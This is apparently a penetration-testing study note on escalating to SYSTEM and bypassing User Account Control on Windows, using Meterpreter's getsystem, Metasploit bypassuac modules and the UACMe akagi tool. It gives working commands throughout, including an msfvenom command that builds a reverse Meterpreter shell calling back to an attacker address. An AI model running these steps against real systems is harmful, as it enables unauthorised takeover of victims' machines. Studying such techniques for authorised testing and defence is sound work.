system and host attacks bypassing uac on windows

Introduction

If we have gained a meterpreter session on a windows machine, a quick way to attempt to gain NT AUTHORITY\SYSTEM (the most powerful non-interactive session) is to use the command: getsystem though this does not always work and may well crash the remote machine so it needs to be used with caution. This command tries different techniques to do priv esc. It only work on Windows. If we want to only try a specific way to do priv esc, we can use the -t flag along with the number of the technique: getsystem -t 1 One problem we may encounter is if User Account Control is enabled. We can find this out by using: post/windows/gather/win_privs If the UAC Enabled column is set to True, we will need to try to bypass this before running getsystem. We will need to background the meterpreter session and then use: search bypassuac We can use the latest bypassuac module against the meterpreter session id: use exploit/windows/local/bypassuac followed by: set session 2 or whatever session id we are targetting. If this works when we run it, a new meterpreter session will open. We will then be able to interact with it and try to run the getsystem command again.

Another way to attempt to bypass uac via a meterpreter session is to background the session and then try: use post/multi/recon/local_exploit_suggester which will list various techniques we can try. We can try these in turn until we find one which works, for example: use exploit/windows/local/bypassuac_dotnet_profiler

UAC

User Account Control is a security feature in windows which opens a prompt when a user attempts to execute a file or command which require elevated privileges. If a low level user attempts this, the uac credential prompt will ask for a local admin username:password and if a local admin account attempts it, the consent prompt will ask for confirmation. Either way, if we are interacting with the victim machine via a meterpreter or cmd session, we will not be able to continue as we will not be able to respond to the uac prompt. This means we need to find ways to bypass uac completely. In order to do this, we will need to have a session for a user who is in the local admin group on the victim machine. The technique which we use to bypass uac will depend on the os version and build running on the victim machine.

UACMe

UACMe is a tool we can find @ UACMe It has lots of ways to bypass uac - we will need to find one which works for the windows environment we are targeting. UACMe works by abusing the inbuilt Windows AutoElevate tool. It uses an executable called akagi. The binary will need to be compiled from the source code in the github repository as it is written mostly in C.

The akagi binary can be used to bypass uac and then run another executable such as a malicious reverse shell. We can generate a reverse meterpreter shell using: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.8 LPORT=1234 -f exe > rs.exe We then need to transfer this reverse shell along with the akagi binary to the victim machine before starting a handler with msfconsole which uses the same payload as we used in the reverse shell: set payload windows/meterpreter/reverse_tcp

Once we have transfered the necessary files to the victim machine and started a handler, we can use: .\Akagi64.exe 23 C:\Temp\rs.exe (the first paramater passed to the akagi binary is the number of the exploit to try - this will depend on the environment we find on the vitim machine - 33 is a good one to try against windows 10 machines). This will hopefully execute the reverse shell which has been specified as the second parameter with elevated privileges since uac has been bypassed.